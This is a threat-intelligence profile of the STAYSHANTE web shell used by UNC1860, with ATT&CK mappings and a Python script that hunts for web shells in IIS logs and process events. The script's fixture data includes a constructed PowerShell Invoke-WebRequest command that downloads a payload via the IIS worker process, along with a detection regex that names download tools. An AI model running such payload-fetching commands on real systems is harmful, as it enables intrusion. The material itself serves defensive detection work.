STAYSHANTE

Malware family. Used by 1 threat actor.

STAYSHANTE is a web shell used by the Iranian state-sponsored threat actor UNC1860, which Mandiant assesses is likely affiliated with Iran’s Ministry of Intelligence and Security (MOIS). It is deployed after initial access is obtained, typically following opportunistic exploitation of vulnerable internet-facing systems, and has been associated with intrusions targeting high-priority Middle Eastern networks, especially government and telecommunications organizations. Reporting also links STAYSHANTE indicators to activity affecting Israeli entities across sectors including managed service providers, local governments, and academia.

STAYSHANTE is part of UNC1860's post-exploitation toolchain and is installed under file names that masquerade as Windows server files or dependencies. It is controlled by the VIROGREEN custom framework, which UNC1860 also uses to exploit vulnerable SharePoint servers via CVE-2019-0604 and to manage post-exploitation payloads. UNC1860 commonly deploys STAYSHANTE alongside SASHEYAWAY, a dropper; together these components stage additional implants and passive backdoors such as TEMPLEDOOR and FACEFACE. Across the reporting, STAYSHANTE is consistently characterized as a web shell within UNC1860's broader arsenal of more than 30 custom tools used to establish footholds and support persistent access. Because the file name is chosen to blend in with legitimate server components, hunting should not rely on the name alone: look for server-side script files in the web root that postdate the last legitimate deployment, and for the IIS worker process spawning command interpreters or downloading files.


THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers.

UNC1860
Evidence: "Web shells like STAYSHANTE and SASHEYAWAY are frequently deployed after initial access is achieved." (via contagiodump.blogspot.com)
MITRE ATT&CK

Techniques & procedures

3 distinct techniques documented for this family, organized by ATT&CK tactic.

Reconnaissance

1 technique
T1595 Active Scanning (evidence: 1). Note that the scanning cited here is the actor's pre-access reconnaissance against public-facing assets; it precedes web shell deployment and is not performed by STAYSHANTE itself.

"Its job is merely to gain that initial foothold, primarily by scanning for vulnerabilities in public-facing assets at targeted organizations"

Persistence

1 technique
T1505.003 Web Shell (evidence: 2)

Web shells like STAYSHANTE and SASHEYAWAY are frequently deployed after initial access is achieved. These shells enable further persistence by deploying full passive backdoors, such as TEMPLEDOOR and FACEFACE, which can execute commands, transfer files, and interact with system services.

Command and Control

1 technique
T1105 Ingress Tool Transfer (evidence: 1)

"Stayshante, Sasheyaway, and tools like it provide its first toe in the water, and can be used to download more substantial backdoors"
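The two ATT&CK entries above (the web shell itself under Persistence, and its use to pull down heavier backdoors under Command and Control), together with the masquerading file names noted in the description, translate into a concrete hunt. The following Python is an added example written for this page; it is not code from Mallory, Mandiant, or any UNC1860 tool. The web-root listing, IIS log lines, process events, file names (including the masquerading name Microsoft.SharePoint.aspx), hosts and IP addresses are all constructed for illustration and are not STAYSHANTE indicators. It flags server-side script files that appeared after the deployment baseline and are receiving POST traffic (T1505.003), and the IIS worker process w3wp.exe spawning a shell, with download commands classified as ingress tool transfer (T1105).

```python
"""Hunt for the web-shell pattern described above in IIS telemetry.

Added example for this page, not code from Mallory, Mandiant or any UNC1860
tool. Every file name, log line, host and IP address below is constructed;
none is a STAYSHANTE indicator.
"""
import os
import re

SERVER_SIDE_EXT = {".aspx", ".ashx", ".asmx", ".asp", ".php", ".jsp"}
WEB_PROCESSES = {"w3wp.exe"}  # IIS worker process
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Command-line fragments meaning the web server process is fetching a file (T1105).
INGRESS_PATTERNS = re.compile(
    r"invoke-webrequest|downloadfile|certutil.*-urlcache|bitsadmin|\bcurl\b|\bwget\b", re.I)

WEB_ROOT_DIR = "C:/inetpub/wwwroot"
BASELINE_DAY = 1  # assumed: day of the last legitimate deployment change

# Constructed web-root listing: (path, day the file first appeared). In a real
# hunt this comes from file creation times or a file-integrity baseline. The
# third entry is a hypothetical masquerading name, not a real STAYSHANTE file.
WEB_ROOT = [
    ("C:/inetpub/wwwroot/default.aspx", 1),
    ("C:/inetpub/wwwroot/layouts/15/upload.aspx", 1),
    ("C:/inetpub/wwwroot/layouts/15/Microsoft.SharePoint.aspx", 40),
    ("C:/inetpub/wwwroot/bin/Microsoft.SharePoint.dll", 1),
]

# Constructed IIS W3C log lines. Field order assumed:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
IIS_LOG = """\
2024-09-20 10:01:02 10.0.0.5 GET /default.aspx - 443 203.0.113.7 Mozilla/5.0 200
2024-09-20 10:03:44 10.0.0.5 POST /layouts/15/upload.aspx - 443 10.0.0.21 Mozilla/5.0 200
2024-09-20 10:05:10 10.0.0.5 POST /layouts/15/Microsoft.SharePoint.aspx - 443 198.51.100.9 python-requests/2.31 200
2024-09-20 10:05:12 10.0.0.5 POST /layouts/15/Microsoft.SharePoint.aspx - 443 198.51.100.9 python-requests/2.31 200
2024-09-20 10:05:15 10.0.0.5 POST /layouts/15/Microsoft.SharePoint.aspx - 443 198.51.100.9 python-requests/2.31 200
"""

# Constructed Sysmon-style process creation events: (parent image, image, command line).
PROCESS_EVENTS = [
    ("C:/Windows/System32/inetsrv/w3wp.exe", "C:/Windows/System32/cmd.exe",
     "cmd.exe /c whoami"),
    ("C:/Windows/System32/inetsrv/w3wp.exe",
     "C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe",
     "powershell -nop -c Invoke-WebRequest http://198.51.100.9/x.bin -OutFile C:/Windows/Temp/x.bin"),
    ("C:/Windows/explorer.exe", "C:/Windows/System32/notepad.exe", "notepad.exe"),
]


def parse_iis_line(line):
    """Split one W3C log line into the fields the hunt needs, or None if malformed."""
    f = line.split()
    if len(f) < 10:
        return None
    return {"method": f[3], "uri": f[4], "client": f[7], "status": int(f[9])}


def new_server_side_files(listing, baseline_day):
    """Server-side script files that appeared after the deployment baseline."""
    return [path for path, day in listing
            if os.path.splitext(path)[1].lower() in SERVER_SIDE_EXT and day > baseline_day]


def post_activity(log_text):
    """Count POST requests per URI stem and record the distinct clients sending them."""
    hits = {}
    for line in log_text.splitlines():
        rec = parse_iis_line(line)
        if rec and rec["method"] == "POST":
            entry = hits.setdefault(rec["uri"], {"posts": 0, "clients": set()})
            entry["posts"] += 1
            entry["clients"].add(rec["client"])
    return hits


def web_root_uri(path, root=WEB_ROOT_DIR):
    """Map a file system path under the web root to the URI stem IIS logs for it."""
    return path[len(root):] if path.startswith(root) else path


def suspicious_children(events):
    """Shells spawned by the IIS worker; download commands are tagged as T1105."""
    findings = []
    for parent, image, cmdline in events:
        if os.path.basename(parent).lower() not in WEB_PROCESSES:
            continue
        child = os.path.basename(image).lower()
        if child in SHELL_CHILDREN:
            technique = "T1105" if INGRESS_PATTERNS.search(cmdline) else "T1505.003"
            findings.append((technique, child, cmdline))
    return findings


def hunt(listing=WEB_ROOT, baseline_day=BASELINE_DAY, log_text=IIS_LOG, events=PROCESS_EVENTS):
    """Return findings tagged with the ATT&CK technique they evidence."""
    findings = []
    posts = post_activity(log_text)
    for path in new_server_side_files(listing, baseline_day):
        act = posts.get(web_root_uri(path), {"posts": 0, "clients": set()})
        # A server-side script that appeared after the baseline and is being
        # POSTed to is the classic web-shell signature, whatever it is named.
        findings.append({"technique": "T1505.003", "path": path,
                         "posts": act["posts"], "clients": sorted(act["clients"])})
    for technique, child, cmdline in suspicious_children(events):
        findings.append({"technique": technique, "process": child, "cmdline": cmdline})
    return findings


if __name__ == "__main__":
    for finding in hunt():
        print(finding)
```

To run this against a real server, replace WEB_ROOT with file creation times from the IIS root (or a file-integrity baseline), IIS_LOG with the site's W3C logs (by default under %SystemDrive%\inetpub\logs\LogFiles), and PROCESS_EVENTS with Sysmon event ID 1 records; the parser assumes the field order given in the comment, so adjust parse_iis_line if the site logs a different field set. Keying the file check on age relative to the baseline rather than on the name is deliberate, since the page notes these shells are installed under names chosen to look like legitimate server components.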
